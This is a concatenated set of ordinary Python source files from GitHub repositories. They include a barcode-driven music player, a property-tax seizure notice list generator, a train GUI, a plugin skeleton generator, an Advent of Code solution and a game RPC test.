str(barcode)\n\tcurs.execute(query)\n\tresult = curs.fetchall()\n\n\t# if we find a match in the database\n\tif result:\n\t\tfor x in result:\n\t\t\t# append the path from the match in the database to the root music path\n\t\t\talbumPath = rootMusicPath / x[0]\n\t\t\t# get a list of mp3 files from the path, alphanumerically sorted (assuming they have track numbers at the start)\n\t\t\tfileList = sorted(albumPath.glob('*.mp3'))\n\t\t\t# find out how many items are currently in the media list so we can insert any new items at the correct position\n\t\t\tmediaListCount = mediaList.count()\n\t\t\t# loop through each mp3 file found in the path\n\t\t\tfor y in fileList:\n\t\t\t\t# write a 'nicer' string with just the filename with no extension (the stem) in the player window\n\t\t\t\tplaylistBox.insert(tkinter.CURRENT, str(y.stem) + \"\\n\")\n\t\t\t\t# append the media to the internal playlist\n\t\t\t\tplaylist.append(y)\n\t\t\t\t# add the media to the media list\n\t\t\t\tmediaList.insert_media(vlc.Media(str(y)), mediaListCount)\n\t\t\t\tmediaListCount += 1\n\n\t\t# if the player is already playing something, we don't want to interrupt this -- so only do these if it's not playing\n\t\tif not listPlayer.is_playing():\n\t\t\tlistPlayer.set_media_list(mediaList)\n\t\t\tlistPlayer.play_item_at_index(0)\n\t\t\tpauseButton.config(text=\"||\")\n\t\t\tnpLabel.config(text=\"Now playing: \" + str(playlist[playlistPos].stem))\n\n\t# no matching album ID in the database, probably good to display an error but right now just blanks the entry box\n\telse:\n\t\t# barcodeEntry.insert(0, \"No match!\")\n\t\t# time.sleep(3)\n\t\tbarcodeEntry.delete(0, tkinter.END)\n\t\t# playlistBox.insert(tkinter.CURRENT, \"No matching album found!\\n\")\n\n\tconn.close()\n\t\ndef clearTracks():\n\tglobal playlistPos\n\n\t# stop the player\n\tlistPlayer.stop()\n\t# clear everything displayed in the playlist window and the Now Playing label\n\tplaylistBox.delete(\"1.0\", tkinter.END)\n\tnpLabel.config(text=\"Now playing: Stopped\")\n\t# clear the playlist and reset playlist position\n\tplaylist.clear()\n\tplaylistPos = 0\n\t# clear the media list\n\tmediaListCount = mediaList.count()\n\ti = 0\n\twhile i < mediaListCount:\n\t\tmediaList.remove_index(0)\n\t\ti += 1\n\t\t\ndef songEnd(event):\n\tglobal playlistPos\n\t\n\tif playlistPos < (len(playlist) - 1):\n\t\tplaylistPos += 1\n\t\tnpLabel.config(text=\"Now playing: \" + str(playlist[playlistPos].stem))\n\n# frame for playlist\nplaylistFrame = tkinter.Frame(playerWindow)\nplaylistFrame.pack()\n\n# playlist widget\nplaylistBox = tkinter.Text(playlistFrame, width=60, height=11, font=playlistFont)\nplaylistBox.pack(side=\"left\")\nscrollY = tkinter.Scrollbar(playlistFrame, orient=\"vertical\", command=playlistBox.yview)\nscrollY.pack(side=\"left\", expand=True, fill=\"y\")\nplaylistBox.configure(yscrollcommand=scrollY.set)\n\n# frame for now playing label\nnpFrame = tkinter.Frame()\nnpFrame.pack(fill=tkinter.X)\n\n# add a \"Now Playing:\" label in the controlFrame\nnpLabel = tkinter.Label(npFrame, text=\"Now playing: Stopped\", font=myFont)\nnpLabel.pack(anchor=tkinter.W, padx=10)\n\n# frame for control buttons \ncontrolFrame = tkinter.Frame()\ncontrolFrame.pack()\n\n# pack the control buttons into controlFrame\nprevButton = tkinter.Button(controlFrame, text=\"<<\", font=myFont, command=prevTrack)\nprevButton.pack(side=tkinter.LEFT)\nstopButton = tkinter.Button(controlFrame, text=\"[]\", font=myFont, command=stopTrack)\nstopButton.pack(side=tkinter.LEFT)\npauseButton = 
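fetchAlbum() above splices the scanned barcode straight into its SQL string; sqlite3 supports '?' parameter binding, which avoids both quoting bugs and injection. A minimal parameterized equivalent of that lookup, assuming the same albums(albumID, albumPath) schema:

import sqlite3

def fetch_album_paths(db_path, barcode):
    with sqlite3.connect(db_path) as conn:
        cur = conn.execute(
            "SELECT albumPath FROM albums WHERE albumID = ?", (barcode,))
        return [row[0] for row in cur.fetchall()]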
tkinter.Button(controlFrame, text=\">\", font=myFont, command=pauseTrack)\npauseButton.pack(side=tkinter.LEFT)\nnextButton = tkinter.Button(controlFrame, text=\">>\", font=myFont, command=nextTrack)\nnextButton.pack(side=tkinter.LEFT)\n\n# frame for extra buttons\nextraFrame = tkinter.Frame()\nextraFrame.pack()\n\n# pack the extra widgets into extraFrame\nbarcodeLabel = tkinter.Label(extraFrame, text=\"UPC Code\", font=myFont)\nbarcodeLabel.pack(side=tkinter.LEFT)\nbarcodeEntry = tkinter.Entry(extraFrame, font=myFont, width=20)\nbarcodeEntry.pack(side=tkinter.LEFT)\nbarcodeEntry.bind('', scanHandler)\nclearButton = tkinter.Button(extraFrame, text='Clear list', font=myFont, command=clearTracks)\nclearButton.pack(side=tkinter.LEFT)\n\n# set event handlers\nevents.event_attach(vlc.EventType.MediaPlayerEndReached, songEnd)\n\nplayerWindow.mainloop()\n","repo_name":"crbenne/musicBox","sub_path":"musicBox.py","file_name":"musicBox.py","file_ext":"py","file_size_in_byte":6184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10868273740","text":"import os\nimport time\n# import module\nimport pandas as pd\nimport xlsxwriter\nimport openpyxl\nfrom openpyxl import Workbook\nfrom datetime import datetime,timedelta\nimport warnings\nwarnings.filterwarnings('ignore')\nimport os\nfrom math import radians, sin, cos, sqrt, atan2\nimport read_data as rd\nimport calaculate_distance as cd\nfrom geopy.geocoders import Nominatim\nfrom openpyxl.styles import PatternFill\n#-----------------------------------------------------------------------------------------------------------------------\n## Define the today's date\n# Define today's date\ntoday = datetime.today().date()\n# Date format's\ntday_dbyfmt = today.strftime(\"%d_%b_%Y\")\ntday_dmyfmt = today.strftime(\"%d%m%Y\")\n# ---------------------------------------------------------------------------------------------------\n\n## Start\nif __name__ == '__main__':\n main_path = r\"D:/\"\n std_path = r\"D:\\Master Data/\"\n inppath = std_path + \"Input/\"\n outpth = std_path + \"Output/\" + tday_dbyfmt + \"/\"\n paidamount_file = main_path + \"Paidamount/\"\n tax_data = main_path + \"/Tax_Data/\"\n os.makedirs(outpth,exist_ok=True)\n mappath = std_path + \"Mapping/\"\n\n#-----------------------------------------------------------------------------------------\nproperty_data, bill_distributed_details, japtinotice_data,zonemap = rd.execute_data(inppath ,tax_data)\njapti_propertydata = japtinotice_data.merge(property_data,on='propertycode',how='left')\njapti_billsdata = japti_propertydata.merge(bill_distributed_details,on='propertycode',how='left')\n\ndata = rd.data_clean(japti_billsdata)\n\nidentical_col_df = pd.DataFrame(data, columns=['propertycode', 'Zone', 'Gat', 'own_mobile','Arrears', 'Current Bill', 'Total_Amount',\n 'propertyLat','propertyLong','finalusetype',\n 'propertyname', 'propertyaddress','status'])\n\n#--------------------------------------------------------------------------------------------------\n\nusetype_filter = identical_col_df[identical_col_df['finalusetype'].isin(['बिगरनिवासी', 'औद्योगिक'])]\nsttaus_np = usetype_filter[usetype_filter['status'].isin(['N' ,'P'])]\n\n# Get current location's latitude and longitude\ncurrent_lat, current_lon = cd.get_current_location()\n\n# Calculate distance for each row and add as a new column 'Distance'\nsttaus_np['Distance'] = sttaus_np.apply(lambda row: cd.calculate_distance(current_lat, current_lon, row['propertyLat'], row['propertyLong']), 
axis=1)\n\n# Sort the dataframe based on the 'Distance' column\ndf_sorted = sttaus_np.sort_values(by='Distance')\n\n# betwn_2L_4L = sttaus_np[(sttaus_np['Total_Amount'] >= 200000) & (sttaus_np['Total_Amount'] < 400000)]\ndf_above2L = df_sorted[(df_sorted['Total_Amount'] >= 200000)]\n\n#--------------------------------------------------------------------------------------------------\ndf_above2L['Zone_eng'] = df_above2L['Zone'].map(zonemap)\n\nlst = [ 'Bhosari', 'Nigdi Pradhikaran', 'Talvade', 'Chinchwad', 'Chikhali','Charholi',\n 'Pimpri Nagar', 'Thergaon', 'Fugewadi Dapodi', 'Moshi']\nselctedzone_data = df_above2L[df_above2L['Zone_eng'].isin(lst)]\n\nwout_latlong = selctedzone_data[selctedzone_data['propertyLong'] > 0]\n\n#----------------------------------------------------------------------------------------------------\n# lst = ['Akurdi', 'Bhosari', 'Dighi Bopkhel', 'MNP Bhavan', 'Nigdi Pradhikaran', 'Talvade', 'Chinchwad', 'Chikhali',\n# 'Pimpri Nagar', 'Thergaon', 'Wakad', 'Kivle', 'Fugewadi Dapodi', 'Pimpri Waghere', 'Sangvi', 'Charholi', 'Moshi']\n\n#-----------------------------------------------------------------------------------------------------\n# gatt = wout_latlong['Gat'].unique().tolist()\ngatt = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10,11,12, 13,14, 15, 16,17,18]\n\nselcted_data = pd.DataFrame(wout_latlong, columns=['Zone', 'Gat', 'propertycode',\n 'own_mobile', 'Arrears', 'Current Bill', 'Total_Amount',\n 'propertyLat','propertyLong','finalusetype',\n 'propertyname', 'propertyaddress',\n 'Zone_eng'])\nrename_data = selcted_data.rename(columns={'Zone':'झोन', 'Gat':'गट क्र', 'propertycode':'मालमत्ता क्रमांक',\n 'own_mobile':'मोबाईल क्र.', 'Arrears':'थकबाकी', 'Current Bill':'चालू मागणी रु.', 'Total_Amount':'एकुण मागणी रु.',\n 'finalusetype':'वापर प्रकार',\n 'propertyname':'मालकाचे नाव', 'propertyaddress':'मालमत्तेचा पत्ता'})\n\n# Function to create Google Maps link\ndef create_google_maps_link(lat, lon):\n return f\"https://www.google.com/maps/search/?api=1&query={lat},{lon}\"\n\n# Create a new column 'GoogleMapsLink'\nrename_data['GoogleMapsLink'] = rename_data.apply(lambda row: create_google_maps_link(row['propertyLat'], row['propertyLong']), axis=1)\n\n#\n# rename_data = pd.DataFrame(rename_data, columns=['झोन','गट क्र','मालमत्ता क्रमांक','वापर प्रकार','मालकाचे नाव','मोबाईल क्र.',\n# 'थकबाकी','चालू मागणी रु.','एकुण मागणी रु.','मालमत्तेचा पत्ता',\n# 'propertyLat','propertyLong','GoogleMapsLink','Call_Date1','Call_Date2',\n# 'Japti_Date','Japti_Status','कारणे',\n# 'Zone_eng'])\n\narrange_data = pd.DataFrame(rename_data, columns=['झोन','गट क्र','मालमत्ता क्रमांक','वापर प्रकार','मालकाचे नाव','मोबाईल क्र.',\n 'थकबाकी','चालू मागणी रु.','एकुण मागणी रु.','मालमत्तेचा पत्ता',\n 'GoogleMapsLink','Call_Date1','Call_Date2',\n 'Japti_Date','Japti_Status','कारणे',\n 'Zone_eng'])\n\narrange_data.to_excel(outpth + \"TotalJaptiDataList.xlsx\",index=False)\n#--------------------------------------------------------------------------------------------------\n\nfor i in lst:\n writer = pd.ExcelWriter(outpth + \"/\" + f\"{i}-Japti List.xlsx\", engine=\"xlsxwriter\")\n for j in gatt:\n filterdata = arrange_data[(arrange_data['Zone_eng'] == i) & (arrange_data['गट क्र'] == j)]\n if len(filterdata) == 0:\n pass\n else:\n filterdata = filterdata.drop(columns=['Zone_eng'])\n filterdata.to_excel(writer, index=False, sheet_name=f\"गट क्र._({str(j)})\")\n\n wb_length = len(filterdata)\n worksheet = writer.sheets[f\"गट क्र._({str(j)})\"]\n\n # rule = '\"कोर्ट केस,कोर्ट केसस्टे,केंद्रीय सरकारमालमत्ता,राज्य सरकार 
मालमत्ता,महानगरपालिकेची मालमत्ता,रस्ता रुंदीकरण्यात पडलेली मालमत्ता,''दुबार मालमत्ता,मोकळी जमीन रद्द करणे,बंद कंपनी,पडीक/जीर्ण मालमत्ता,सापडत नसलेली मालमत्ता,BIFR/Liquidation,इतर,\"'\n            # rule = '\"Yes,No\"'\n            # dropdown_range = f'R2:R{wb_length + 1}'\n            # worksheet.data_validation(dropdown_range, {'validate': 'list', 'source': rule})\n            worksheet.freeze_panes(1, 3)\n            workbook = writer.book\n\n            worksheet.set_column('C1:O1', 13)\n            # worksheet.set_column('D1:D1', 16)\n            border_format = workbook.add_format({'border': 1,\n                                                 'align': 'left',\n                                                 'font_color': '#000000',\n                                                 'font_size': 20})\n            worksheet.conditional_format(f'A1:T{wb_length + 1}', {'type': 'cell',\n                                                                  'criteria': '>=',\n                                                                  'text_wrap': True,\n                                                                  'value': 0,\n                                                                  'format': border_format})\n            worksheet.set_row(wb_length + 1, 28)\n            # note: these openpyxl PatternFill objects are never used below; the xlsxwriter formats are applied instead\n            red_fill = PatternFill(start_color='FF0000', end_color='FF0000', fill_type='solid')\n            blue_fill = PatternFill(start_color='0000FF', end_color='0000FF', fill_type='solid')\n\n            worksheet.conditional_format(f'I2:I{wb_length + 1}', {'type': 'cell',\n                                                                  'criteria': '>=',\n                                                                  'value': 400000,\n                                                                  'format': workbook.add_format({'bg_color': 'red', 'font_color': 'white'})})\n            worksheet.conditional_format(f'I2:I{wb_length + 1}', {'type': 'cell',\n                                                                  'criteria': '<',\n                                                                  'value': 400000,\n                                                                  'format': workbook.add_format({'bg_color': 'blue', 'font_color': 'white'})})\n    writer.close()\n\n\n","repo_name":"yadnesh9trix/Japti_Notices","sub_path":"Code/japtinotice_forzonaltarget.py","file_name":"japtinotice_forzonaltarget.py","file_ext":"py","file_size_in_byte":10185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}{"seq_id":"43563259896","text":"from tkinter import Canvas, Tk\n\n\nclass Station:\n\n    def __init__(self, xcoor, ycoor, color):\n        self.size = 8\n        self.xcoor_left = xcoor - self.size\n        self.ycoor_bottom = ycoor - self.size\n        self.xcoor_right = xcoor + self.size\n        self.ycoor_top = ycoor + self.size\n        self.color = color\n\n\nclass TrainCanvas(Canvas):\n\n    def __init__(self, master):\n        super().__init__(master, width=900, height=900, bg=\"white\")\n        self.pack()\n        self.stations = []  # canvas item ids for the drawn station markers\n        self.trains = []  # canvas item ids for trains on the Canvas (not used yet)\n\n    def add_stations(self, list_stations):\n        for i in range(len(list_stations)):\n            station = Station(list_stations[i][0], list_stations[i][1], list_stations[i][2])\n            self.stations.append(\n                self.create_oval(station.xcoor_left, station.ycoor_bottom, station.xcoor_right, station.ycoor_top,\n                                 outline=station.color, width=\"3\"))\n\n        # self.delete(self.stations[1])\n\n\nif __name__ == '__main__':\n    shop_window = Tk()\n    shop_window.geometry(\"900x900\")\n    c = TrainCanvas(shop_window)\n\n    c.add_stations([[50, 50, \"red\"], [200, 200, \"green\"], [800, 800, \"blue\"]])\n    shop_window.mainloop()\n","repo_name":"jtrailor/MBTA_Tracker","sub_path":"GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}{"seq_id":"35328734262","text":"import os\n\n# Define the folder path to be processed\nfolder_path = input('Please enter your Sector Path:')\n\n# Get all files in the folder whose names end with '_TWR.prf'\nfile_list = [f for f in os.listdir(folder_path) if f.endswith('_TWR.prf')]\n\n# Iterate over each file\nfor file_name in file_list:\n    file_path = os.path.join(folder_path, file_name)\n    \n    # Open the file and read its contents\n    with open(file_path, 'r', errors='ignore') as file:\n        lines = file.readlines()\n    \n    # Delete lines 32 through 51\n    del lines[31:51] # note: indexing starts at 0, i.e. the first line is 0, the second is 1, and so on\n    \n    # Reopen the file and write the modified contents back\n    with 
open(file_path, 'w', errors='ignore') as file:\n        file.writelines(lines)\n\nprint(\"Deletion operation complete.\")","repo_name":"AaronZSAM101/SectorDeveloping","sub_path":"Model/ExistingFileFactory/删除指定行文本.py","file_name":"删除指定行文本.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}{"seq_id":"10155609350","text":"#! /usr/bin/env python3\n\nimport sys\nimport os.path\nimport random\nimport math\n\ndef main():\n    _path = \"sin2.txt\"\n    _number = 1000000\n    _range_max = 200\n    _range_min = 50\n    _x_max = 500\n    _x_min = 0\n\n    argv = sys.argv\n    argc = len(argv)\n\n    if(argc == 2):\n        _path = sys.argv[1]\n    elif(argc == 3):\n        _range_max = int(argv[1])\n        _range_min = int(argv[2])\n    elif(argc == 4):\n        _path = (argv[1])\n        _range_max = int(argv[2])\n        _range_min = int(argv[3])\n\n\n    fout = open(os.path.abspath(_path), 'w')\n    fout.write(str(_x_min) + \" \" + str(_x_max) + \"\\n\")\n    fout.write(str(-100) + \" \" + str(3000) + \"\\n\")\n\n    fout.write(str(_number) + \"\\n\")\n\n    for i in range(_number):\n        tmp = math.sin(i/30000)*120 + math.sin(i/1000)*100 + math.sin(50*i) + (math.sin(i/20) * 60)\n        if(random.randint(0,1000) % 100 == 0):\n            tmp *= 3\n        sin_line = (_range_max + 600) + tmp\n        number = sin_line + (random.randint(5, 20) * math.sin(i))\n        fout.write(str(number) + \" \")\n    fout.write(\"\\n\")\n    fout.close()\n\n\n    #for i in range(_number):\n    #    tmp = (math.sin(i/20) * 100);\n    #    if(random.randint(0,1000) % 100 == 0):\n    #        tmp *= 3\n    #    sin_line = (_range_max + 600) + tmp\n    #    number = sin_line + (random.randint(5, 20) * math.sin(i)) + 900\n    #    fout.write(str(number) + \" \")\n    #fout.write(\"\\n\")\n\n\n\nmain()\n\n\n\n\n\n\n","repo_name":"pestanko/big_sequences_graph","sub_path":"serverjs/gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}{"seq_id":"42488064349","text":"import argparse\nimport os\n\n\nPLUGIN_TYPES = {\"compiler\", \"irtransformation\", \"iroptimization\", \"gate-instruction\", \"benchmark-algorithm\"}\n\nDESCRIPTION = \"\"\"\nA utility for generating plugin skeletons.\nE.g. 
to generate a new compiler plugin for the \"my_lang\" language, run\n'python3 -m xacc generate-plugin -t compiler -n my_lang'\n\"\"\"\n\ndef add_subparser(subparsers):\n    \"\"\"Add the 'generate-plugin' subparser to subparsers.\"\"\"\n    subparser = subparsers.add_parser(\"generate-plugin\", help=\"A utility for generating plugin skeletons.\", description=DESCRIPTION,\n                                      formatter_class=argparse.RawDescriptionHelpFormatter)\n    subparser.add_argument(\"-o\", \"--output\", help=\"output location (defaults to current directory)\")\n    subparser.add_argument(\"-v\", \"--verbose\", help=\"increase verbosity\", action=\"store_true\")\n    subparser.add_argument(\"-l\", \"--list\", help=\"list available plugin types\", action=\"store_true\")\n    required_group = subparser.add_argument_group(\"required arguments\")\n    required_group.add_argument(\"-t\", \"--type\", help=\"plugin type\", choices=PLUGIN_TYPES)\n    required_group.add_argument(\"-n\", \"--name\", help=\"plugin name\")\n\n\ndef run_generator(args, xacc_root):\n    \"\"\"Run the appropriate generator given args.\"\"\"\n    if args.list and args.type is None and args.name is None:\n        print(\"Available plugin types:\")\n        print(PLUGIN_TYPES)\n        exit(0)\n    if args.type and args.name:\n        args.libname = \"xacc-{}\".format(args.name.lower())\n        if args.output:\n            os.chdir(args.output)\n        os.mkdir(args.libname)\n        templates_dir = os.path.join(os.path.dirname(__file__), \"templates/\")\n        output_dir = os.path.join(os.getcwd(), args.libname)\n        if args.type.lower() in [\"irtransformation\",\"iroptimization\"]:\n            template_dir = os.path.join(templates_dir, \"irtransformation/\")\n            if args.verbose:\n                print(\"Generating an IR Optimization or Transformation plugin...\")\n            generate_irtransformation(template_dir, output_dir, xacc_root, args)\n        elif args.type.lower() == \"compiler\":\n            template_dir = os.path.join(templates_dir, \"compiler/\")\n            if args.verbose:\n                print(\"Generating a compiler plugin...\")\n            generate_compiler(template_dir, output_dir, xacc_root, args)\n        elif args.type.lower() == \"accelerator\":\n            print('Accelerator plugin gen not implemented yet.')\n            return\n        elif args.type.lower() == \"gate-instruction\":\n            template_dir = os.path.join(templates_dir, \"gate_instruction/\")\n            if args.verbose:\n                print(\"Generating a gate-instruction plugin...\")\n            generate_instruction(template_dir, output_dir, xacc_root, args)\n        elif args.type.lower() == \"benchmark-algorithm\":\n            template_dir = os.path.join(templates_dir, \"benchmark_algorithm\")\n            if args.verbose:\n                print(\"Generating a benchmark-algorithm plugin...\")\n            generate_benchmark_algorithm(template_dir, output_dir, xacc_root, args)\n    else:\n        print(\"Please specify a type (-t) and name (-n). 
Use -l (--list) to see available plugins to generate\")\n\ndef generate(template_dir, output_dir, format_func, verbose=False):\n for dirpath, dirnames, filenames in os.walk(template_dir):\n dir_rel_path = os.path.relpath(dirpath, template_dir)\n if verbose:\n print(\"Entered {}/\".format(dir_rel_path))\n for dirname in dirnames:\n outdir_name = format_func(dirname)\n outdir_path = os.path.join(output_dir, dir_rel_path, outdir_name)\n os.mkdir(outdir_path)\n if verbose:\n print(\"Created {}\".format(outdir_path))\n for filename in filenames:\n with open(os.path.join(dirpath, filename), 'r') as template_file:\n contents = template_file.read()\n outfile_name = format_func(filename)\n outfile_path = os.path.join(output_dir, dir_rel_path, outfile_name)\n contents = format_func(contents)\n with open(outfile_path, 'w') as outfile:\n outfile.write(contents)\n if verbose:\n print(\"Created {}\".format(outfile_path))\n\n\ndef generate_irtransformation(template_dir, output_dir, xacc_root_path, args):\n irt_lib_name = \"{}transformation\".format(args.libname)\n class_name = \"{}IRTransformation\".format(args.name.capitalize())\n generate(template_dir, output_dir, format_func=lambda s: s.format(\n xacc_root=xacc_root_path,\n lib_name=args.libname,\n project_name=args.name,\n project_name_upper=args.name.upper(),\n irt_bundle_name=irt_lib_name.replace('-','_'),\n irt_lib_name=irt_lib_name,\n irt_class_name=class_name,\n irt_class_name_lower=class_name.lower(),\n irt_class_name_upper=class_name.upper()\n ), verbose=args.verbose)\n\n\ndef generate_compiler(template_dir, output_dir, xacc_root_path, args):\n compiler_lib_name = \"{}compiler\".format(args.libname)\n class_name = \"{}Compiler\".format(args.name.capitalize())\n generate(template_dir, output_dir, format_func=lambda s: s.format(\n xacc_root=xacc_root_path,\n lib_name=args.libname,\n project_name=args.name,\n project_name_upper=args.name.upper(),\n compiler_bundle_name=compiler_lib_name.replace('-', '_'),\n compiler_lib_name=compiler_lib_name,\n compiler_class_name=class_name,\n compiler_class_name_lower=class_name.lower(),\n compiler_class_name_upper=class_name.upper()\n ), verbose=args.verbose)\n\ndef generate_instruction(template_dir, output_dir, xacc_root_path, args):\n inst_lib_name = \"{}instruction\".format(args.libname)\n class_name = \"{}\".format(args.name.capitalize())\n generate(template_dir, output_dir, format_func=lambda s: s.format(\n xacc_root=xacc_root_path,\n lib_name=args.libname,\n project_name=args.name,\n project_name_upper=args.name.upper(),\n inst_bundle_name=inst_lib_name.replace('-','_'),\n inst_lib_name=inst_lib_name,\n inst_class_name=class_name,\n inst_class_name_lower=class_name.lower(),\n inst_class_name_upper=class_name.upper()\n ), verbose=args.verbose)\n\ndef generate_benchmark_algorithm(template_dir, output_dir, xacc_root_path, args):\n generate(template_dir, output_dir, format_func=lambda s: s.format(\n benchmark_algorithm_name=args.name\n ), verbose=args.verbose)\n","repo_name":"eclipse/xacc","sub_path":"python/plugin_generator/plugin_generator.py","file_name":"plugin_generator.py","file_ext":"py","file_size_in_byte":6520,"program_lang":"python","lang":"en","doc_type":"code","stars":154,"dataset":"github-code","pt":"48"} +{"seq_id":"72779040465","text":"from pathlib import Path\nfrom itertools import chain\n\n\ndef build_texts_from_repository(repo_dir):\n \"\"\"Return a dataset of the code\n \"\"\"\n dataset = []\n file_types = []\n for path in chain(\n Path(repo_dir).glob(\"**/*.py\"),\n 
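# both the Python sources and the Markdown docs are indexed; additional glob patterns could be chained here\n        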
Path(repo_dir).glob(\"**/*.md\"),\n ):\n assert path.is_file() and path.suffix\n lines = path.read_text().splitlines()\n \n dataset.extend(\n [{\"line_number\": i,\n \"line\": line,\n \"path\": str(path.relative_to(repo_dir))}\n for i, line in enumerate(lines)\n ]\n )\n return dataset\n\n\ndef build_query_dataset(queries, dataset):\n ...\n","repo_name":"namoopsoo/interview-me","sub_path":"code_search.py","file_name":"code_search.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42127044691","text":"from dataclasses import dataclass\nfrom enum import Flag\nfrom importlib.resources import open_text\nfrom itertools import islice\nfrom typing import Dict, List, Mapping\n\n\nclass Segment(Flag):\n A, B, C, D, E, F, G = 1, 2, 4, 8, 16, 32, 64\n\n @classmethod\n def parse(cls, s: str) -> \"Segment\":\n value = 0\n for c in s.upper():\n value |= cls[c].value\n\n return cls(value)\n\n def __len__(self) -> int:\n return bin(self.value).count(\"1\")\n\n def __iter__(self):\n return (s for s in self.__class__ if s in self)\n\n\n@dataclass\nclass Entry:\n signals: List[Segment]\n digits: List[Segment]\n\n @classmethod\n def parse(cls, s: str) -> \"Entry\":\n words = s.split()\n if len(words) != 15 or words[10] != \"|\":\n raise ValueError(\"Expected 10 signal patterns followed by 4 digits.\")\n\n # Parse 10 words as segments, the '|' separator and 4 words as segments.\n iterator = iter(words)\n signals = list(map(Segment.parse, islice(iterator, 10)))\n digits = list(map(Segment.parse, islice(iterator, 1, None)))\n\n return cls(signals, digits)\n\n def decode(self) -> int:\n digits = self.find_digits()\n\n # Use the mapping to decode the digits and combine them into an integer.\n value = 0\n length = len(self.digits)\n for i in range(length):\n value += 10 ** (length - i - 1) * digits[self.digits[i]]\n\n return value\n\n def find_digits(self) -> Mapping[Segment, int]:\n # Start by creating maps for digits and segments.\n digits: Dict[int, Segment] = {}\n mapping: Dict[Segment, Segment] = {}\n\n # Find 2 as it is the only digit not to contain segment F.\n for f in Segment:\n found = [s for s in self.signals if f not in s]\n if len(found) == 1:\n digits[2] = found[0]\n mapping[Segment.F] = f\n break\n else:\n raise ValueError(\"Cannot find segment F.\")\n\n # Find 7 (three segments) and 1 (two segments); we can find segment A.\n digits[1] = next(s for s in self.signals if len(s) == 2)\n digits[7] = next(s for s in self.signals if len(s) == 3)\n mapping[Segment.A] = digits[1] ^ digits[7]\n\n # Deduce segment C from 1.\n mapping[Segment.C] = digits[1] ^ mapping[Segment.F]\n\n # Find 6 by removing C from 8.\n digits[8] = next(s for s in self.signals if len(s) == 7)\n digits[6] = digits[8] ^ mapping[Segment.C]\n\n # Find 5 which differs from 6 with segment E removed.\n for e in digits[6]:\n five = digits[6] ^ e\n if five in self.signals:\n digits[5] = five\n mapping[Segment.E] = e\n break\n else:\n raise ValueError(\"Cannot find segment E.\")\n\n # Find 9 which differs from 8 with segment E removed.\n digits[9] = digits[8] ^ mapping[Segment.E]\n\n # Find 4 (four segments).\n digits[4] = next(s for s in self.signals if len(s) == 4)\n\n # Find segment G by adding segment A to 4 then compare with 9.\n mapping[Segment.G] = digits[9] ^ (digits[4] | mapping[Segment.A])\n\n # Find segment B and D by using the difference of 1 and 4 and remove either\n # from 9 to find 3.\n b_d = digits[1] ^ digits[4]\n for b in 
b_d:\n three = digits[9] ^ b\n if three in self.signals:\n digits[3] = three\n mapping[Segment.B] = b\n mapping[Segment.D] = b_d ^ b\n break\n else:\n raise ValueError(\"Cannot find segment B.\")\n\n # Find 0 by removing D from 8.\n digits[0] = digits[8] ^ mapping[Segment.D]\n\n # Finally, flip the digits mapping and return it.\n return {s: d for d, s in digits.items()}\n\n\ndef _get_entries() -> List[Entry]:\n with open_text(\"aoc21.days\", \"day08.txt\") as f:\n return list(map(Entry.parse, f))\n\n\ndef part1() -> object:\n # The digits 1, 4, 7 and 8 have 2, 4, 3 and 7 segments respectively.\n unique = (2, 3, 4, 7)\n return sum(1 for e in _get_entries() for d in e.digits if len(d) in unique)\n\n\ndef part2() -> object:\n return sum(map(Entry.decode, _get_entries()))\n","repo_name":"macph/aoc21","sub_path":"src/aoc21/days/day08.py","file_name":"day08.py","file_ext":"py","file_size_in_byte":4264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37737758237","text":"from pxtest import PXTest\n\n\nclass SplitStateRpcsTest (PXTest):\n\n def run (self):\n self.collectPremine ()\n\n # Set up a non-trivial situation, where we have characters, prospected\n # regions, kills/fame, buildings, ground loot and ongoing operations.\n self.initAccount (\"prospector\", \"r\")\n self.initAccount (\"killed\", \"g\")\n self.sendMove (\"sale buyer\", {\"vc\": {\"m\": {}}}, burn=10)\n self.dropLoot ({\"x\": 1, \"y\": 2}, {\"foo\": 5, \"bar\": 10})\n self.dropLoot ({\"x\": -1, \"y\": 20}, {\"foo\": 5})\n self.build (\"checkmark\", None, {\"x\": -100, \"y\": 200}, rot=5)\n self.createCharacters (\"prospector\")\n self.createCharacters (\"killed\")\n self.generate (1)\n self.moveCharactersTo ({\n \"prospector\": {\"x\": 0, \"y\": 0},\n \"killed\": {\"x\": 0, \"y\": 0},\n })\n self.setCharactersHP ({\n \"killed\": {\"a\": 1, \"s\": 0},\n })\n self.getCharacters ()[\"prospector\"].sendMove ({\"prospect\": {}})\n self.generate (20)\n self.moveCharactersTo ({\n \"prospector\": {\"x\": 100, \"y\": -100},\n })\n self.getCharacters ()[\"prospector\"].sendMove ({\"prospect\": {}})\n self.generate (3)\n\n # Test that the full game state corresponds to the split RPCs.\n state = self.getGameState ()\n accounts = self.getRpc (\"getaccounts\")\n buildings = self.getRpc (\"getbuildings\")\n characters = self.getRpc (\"getcharacters\")\n loot = self.getRpc (\"getgroundloot\")\n ongoings = self.getRpc (\"getongoings\")\n regions = self.getRpc (\"getregions\", fromheight=0)\n moneySupply = self.getRpc (\"getmoneysupply\")\n prizes = self.getRpc (\"getprizestats\")\n assert len (accounts) > 0\n assert len (buildings) > 0\n assert len (characters) > 0\n assert len (loot) > 0\n assert len (ongoings) > 0\n assert len (regions) > 0\n assert len (moneySupply[\"entries\"]) > 0\n assert len (prizes) > 0\n self.assertEqual (accounts, state[\"accounts\"])\n self.assertEqual (buildings, state[\"buildings\"])\n self.assertEqual (characters, state[\"characters\"])\n self.assertEqual (loot, state[\"groundloot\"])\n self.assertEqual (ongoings, state[\"ongoings\"])\n self.assertEqual (regions, state[\"regions\"])\n self.assertEqual (moneySupply, state[\"moneysupply\"])\n self.assertEqual (prizes, 